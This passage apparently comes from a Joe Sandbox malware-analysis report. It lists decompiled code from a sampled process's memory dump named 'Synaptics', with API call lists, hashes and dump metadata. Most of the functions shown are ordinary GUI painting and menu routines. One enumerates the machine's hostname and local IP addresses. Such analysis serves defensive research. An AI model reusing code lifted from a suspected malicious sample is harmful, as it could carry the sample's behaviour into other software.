                                                                                                                                                                                                                            							if(_a8 == 0) {
                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                            								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t76 = E00424950(0xff00000d);
                                                                                                                                                                                                                            								_t78 = E00424950(0xff000010);
                                                                                                                                                                                                                            								__eflags = _t76 - _t78;
                                                                                                                                                                                                                            								if(_t76 != _t78) {
                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if((_t117 & 0x00000004) == 0) {
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						_v32.top = _v32.top + 4;
                                                                                                                                                                                                                            						DrawEdge(E00425C68(_v8),  &_v32, 6, 2);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_v16 == 0) {
                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                            						E00404C88( &_v16, 0x44b0fc);
                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *_v16 != 0x26) {
                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t153 =  *((char*)(_v16 + 1));
                                                                                                                                                                                                                            					if(_t153 != 0) {
                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0044AFCF
                                                                                                                                                                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044B020
                                                                                                                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B055
                                                                                                                                                                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044B062
                                                                                                                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B0C9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Draw$OffsetRectText$Edge
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3610532707-0
                                                                                                                                                                                                                            • Opcode ID: aa2038870a8fdccfec43aecca8dda92930077ba560af71d0df73fffac7ff7146
                                                                                                                                                                                                                            • Instruction ID: ea5abe3bfc9a9df89051e6d8e73c4225462b89b626b3e2b5561302bed16b813c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa2038870a8fdccfec43aecca8dda92930077ba560af71d0df73fffac7ff7146
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C551A3B0A04204AFEB10EBA9D881B9F73E5EF44324F55856BF924A7381C73CED048B59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0043F3B8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                            				int _v20;
                                                                                                                                                                                                                            				struct tagPAINTSTRUCT _v84;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                            				struct HDC__* _t75;
                                                                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                            				void* _t101;
                                                                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t100 = _t101;
                                                                                                                                                                                                                            				_t102 = _t101 + 0xffffffb0;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t75 =  *(_v12 + 4);
                                                                                                                                                                                                                            				if(_t75 == 0) {
                                                                                                                                                                                                                            					_t75 = BeginPaint(E00441704(_v8),  &_v84);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_t100);
                                                                                                                                                                                                                            				_push(0x43f4d8);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t102;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                                                                                                                                                                                                                            					_v20 = SaveDC(_t75);
                                                                                                                                                                                                                            					_v16 = 2;
                                                                                                                                                                                                                            					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                                                                                                                                                                                                                            					if(_t95 >= 0) {
                                                                                                                                                                                                                            						_t96 = _t95 + 1;
                                                                                                                                                                                                                            						_t98 = 0;
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							_t64 = E0041AC6C( *((intOrPtr*)(_v8 + 0x198)), _t98);
                                                                                                                                                                                                                            							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                                                                                                                                                                                                                            								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                                                                                                                                                                                                                            									goto L11;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                                                                                                                                                                                                                            									if(_v16 != 1) {
                                                                                                                                                                                                                            										goto L11;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                            							L11:
                                                                                                                                                                                                                            							_t98 = _t98 + 1;
                                                                                                                                                                                                                            							_t96 = _t96 - 1;
                                                                                                                                                                                                                            						} while (_t96 != 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                            					if(_v16 != 1) {
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					RestoreDC(_t75, _v20);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E0043F510(_v8, 0, _t75);
                                                                                                                                                                                                                            				_pop(_t84);
                                                                                                                                                                                                                            				 *[fs:eax] = _t84;
                                                                                                                                                                                                                            				_push(0x43f4df);
                                                                                                                                                                                                                            				_t55 = _v12;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                                                                                                                                                                                                                            					return EndPaint(E00441704(_v8),  &_v84);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t55;
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0043F412
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043F474
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0043F49E
                                                                                                                                                                                                                            • EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3808407030-0
                                                                                                                                                                                                                            • Opcode ID: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                                                                                                                                                                                            • Instruction ID: 9443a4bcddcea103c83dcf0c2b69b8a33cb36b1669e9c3c4d5886d405921b8f2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA415070E00208AFC700DB99C984EAFB7F9AF58318F5490BAE90497362D739AE45CB54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044AD40(int __eax, void* __edx) {
                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                            				int _t46;
                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                            				intOrPtr* _t48;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t18 = __eax;
                                                                                                                                                                                                                            				_t48 = __eax;
                                                                                                                                                                                                                            				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                                                                                                                                                                                                            					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                                                                                                                                                                                                            						 *((char*)(__eax + 0x74)) = 1;
                                                                                                                                                                                                                            						return __eax;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                                                                                                                                                                                                            						return E0044AD40(_t19, __edx);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t18 = GetMenuItemCount(E0044AE70(__eax));
                                                                                                                                                                                                                            					_t47 = _t18;
                                                                                                                                                                                                                            					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                                                                                                                                                                                                                            					while(_t47 > 0) {
                                                                                                                                                                                                                            						_t46 = _t47 - 1;
                                                                                                                                                                                                                            						_t18 = GetMenuState(E0044AE70(_t48), _t46, 0x400);
                                                                                                                                                                                                                            						if((_t18 & 0x00000004) == 0) {
                                                                                                                                                                                                                            							_t18 = RemoveMenu(E0044AE70(_t48), _t46, 0x400);
                                                                                                                                                                                                                            							_t40 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t47 = _t47 - 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t40 != 0) {
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                            							E0044AC00(_t48);
                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                            							return  *((intOrPtr*)( *_t48 + 0x3c))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t44 =  *0x449854; // 0x4498a0
                                                                                                                                                                                                                            						if(E00403D78( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044AE70(_t48)) != 0) {
                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							DestroyMenu( *(_t48 + 0x34));
                                                                                                                                                                                                                            							 *(_t48 + 0x34) = 0;
                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t18;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                                                                                                                                                                                            • Instruction ID: ccdcb766eb864ac881303502937fc5a84d080c6be124c079d60bb56e6bda1b55
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7111D270EC521857FB60BEBA8806B5B378A5F41749F14042FBD119B782DA3CDC65829F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0045A390(void* __eax, void* __ecx, struct HWND__** __edx) {
                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                            				intOrPtr _t20;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                            				struct HWND__** _t34;
                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                            				struct HWND__* _t36;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t31 = __ecx;
                                                                                                                                                                                                                            				_t34 = __edx;
                                                                                                                                                                                                                            				_t33 = __eax;
                                                                                                                                                                                                                            				_t30 = 0;
                                                                                                                                                                                                                            				_t11 =  *((intOrPtr*)(__edx + 4));
                                                                                                                                                                                                                            				if(_t11 < 0x100 || _t11 > 0x108) {
                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                            					return _t30;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t35 = GetCapture();
                                                                                                                                                                                                                            					if(_t35 != 0) {
                                                                                                                                                                                                                            						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x49e668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                                                                                                                                                                            							_t30 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t36 =  *_t34;
                                                                                                                                                                                                                            					_t2 = _t33 + 0x44; // 0x0
                                                                                                                                                                                                                            					_t20 =  *_t2;
                                                                                                                                                                                                                            					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                            						if(E00437E5C(_t36, _t31) == 0 && _t36 != 0) {
                                                                                                                                                                                                                            							_t36 = GetParent(_t36);
                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t36 == 0) {
                                                                                                                                                                                                                            							_t36 =  *_t34;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t36 = E00441704(_t20);
                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                            						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                                                                                                                                                                            							_t30 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCapture.USER32 ref: 0045A3B3
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A407
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 0045A417
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A436
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$CaptureLongWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1158686931-0
                                                                                                                                                                                                                            • Opcode ID: f12de09e93a5b015bcf77922c91d4743cfc05ccfc7e81301400765280e2ab61c
                                                                                                                                                                                                                            • Instruction ID: 3b7db6bc04ec6c9b9a315d118ec06550147a56b28b89c41b1f9545d3d98f8dbc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f12de09e93a5b015bcf77922c91d4743cfc05ccfc7e81301400765280e2ab61c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 491193712042095F9620FA9DC884F1373CC9B15319B10453AFD59C3343EAACFC54826B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 22%
                                                                                                                                                                                                                            			E00442F0C(void* __eax) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				intOrPtr* _t14;
                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                            				intOrPtr _t19;
                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t49 = _t51;
                                                                                                                                                                                                                            				_t52 = _t51 + 0xfffffff4;
                                                                                                                                                                                                                            				_t39 = __eax;
                                                                                                                                                                                                                            				if( *((short*)(__eax + 0x68)) == 0xffff) {
                                                                                                                                                                                                                            					return __eax;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t14 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            					_t17 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                                                                                                                                                                                                                            					_push(_t19);
                                                                                                                                                                                                                            					L0042C408();
                                                                                                                                                                                                                            					_v8 = _t19;
                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                            					_push(0x442fcc);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t52;
                                                                                                                                                                                                                            					_t21 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            					E0042C440(_v8, E004586EC( *_t21,  *((short*)(__eax + 0x68))));
                                                                                                                                                                                                                            					_t26 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            					E0042C440(_v8, E004586EC( *_t26,  *((short*)(_t39 + 0x68))));
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                                                                            					L0042C48C();
                                                                                                                                                                                                                            					_push( &_v16);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L0042C49C();
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                                                                            					L0042C48C();
                                                                                                                                                                                                                            					_pop(_t47);
                                                                                                                                                                                                                            					 *[fs:eax] = _t47;
                                                                                                                                                                                                                            					_push(0x442fd3);
                                                                                                                                                                                                                            					_t37 = _v8;
                                                                                                                                                                                                                            					_push(_t37);
                                                                                                                                                                                                                            					L0042C410();
                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73751AB0.COMCTL32(00000000), ref: 00442F3E
                                                                                                                                                                                                                              • Part of subcall function 0042C440: 73752140.COMCTL32(00439016,000000FF,00000000,00442F6E,00000000,00442FCC,?,00000000), ref: 0042C444
                                                                                                                                                                                                                            • 73751680.COMCTL32(00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F92
                                                                                                                                                                                                                            • 73751710.COMCTL32(00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F9D
                                                                                                                                                                                                                            • 73751680.COMCTL32(00439016,00000001,?,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FB0
                                                                                                                                                                                                                            • 73751F60.COMCTL32(00439016,00442FD3,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FC6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 7375173751680$7375171073752140
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3191654781-0
                                                                                                                                                                                                                            • Opcode ID: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                                                                                                                                                                                            • Instruction ID: 31acb13db4a7b61839ae31ff436912f2200b31873635aba84f9d8170318329f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B216F74B04204AFEB10EBA9DCD2F6E73F8EB48704F900066F904DB291DAB9AD40C758
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00472C58(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				char _v408;
                                                                                                                                                                                                                            				char _v412;
                                                                                                                                                                                                                            				char _v416;
                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                                                                                            				intOrPtr* _t53;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v416 = 0;
                                                                                                                                                                                                                            				_v412 = 0;
                                                                                                                                                                                                                            				 *[fs:eax] = _t58 + 0xfffffe64;
                                                                                                                                                                                                                            				_t38 = E00408D24(0x104, __eflags);
                                                                                                                                                                                                                            				L00472BD0();
                                                                                                                                                                                                                            				_v8 = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0x44))(0x101,  &_v408,  *[fs:eax], 0x472d31, _t58, __edi, __esi, __ebx, _t56);
                                                                                                                                                                                                                            				E00404BB8( &_v412, _t38);
                                                                                                                                                                                                                            				_t30 = gethostname(_t38, E00404C80(_v412));
                                                                                                                                                                                                                            				_push(_t38);
                                                                                                                                                                                                                            				L00472BC0();
                                                                                                                                                                                                                            				if(_t30 != 0) {
                                                                                                                                                                                                                            					_t55 =  *((intOrPtr*)(_t30 + 0xc));
                                                                                                                                                                                                                            					_t39 = 0;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t53 =  *((intOrPtr*)(_t55 + _t39 * 4));
                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L00472BB8();
                                                                                                                                                                                                                            						E00404BB8( &_v416, _t30);
                                                                                                                                                                                                                            						_t30 =  *((intOrPtr*)( *_v8 + 0x38))( *_t53);
                                                                                                                                                                                                                            						_t39 = _t39 + 1;
                                                                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L00472BD8();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t48);
                                                                                                                                                                                                                            				 *[fs:eax] = _t48;
                                                                                                                                                                                                                            				_push(0x472d38);
                                                                                                                                                                                                                            				return E004049E4( &_v416, 2);
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?,00000000,00472D31), ref: 00472C98
                                                                                                                                                                                                                            • gethostname.WSOCK32(00000000,00000000), ref: 00472CCE
                                                                                                                                                                                                                            • gethostbyname.WSOCK32(00000000,00000000,00000000), ref: 00472CD4
                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?,00000000,00000000,00000000), ref: 00472CE6
                                                                                                                                                                                                                            • WSACleanup.WSOCK32(?,00000000,00000000,00000000), ref: 00472D0E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 348263315-0
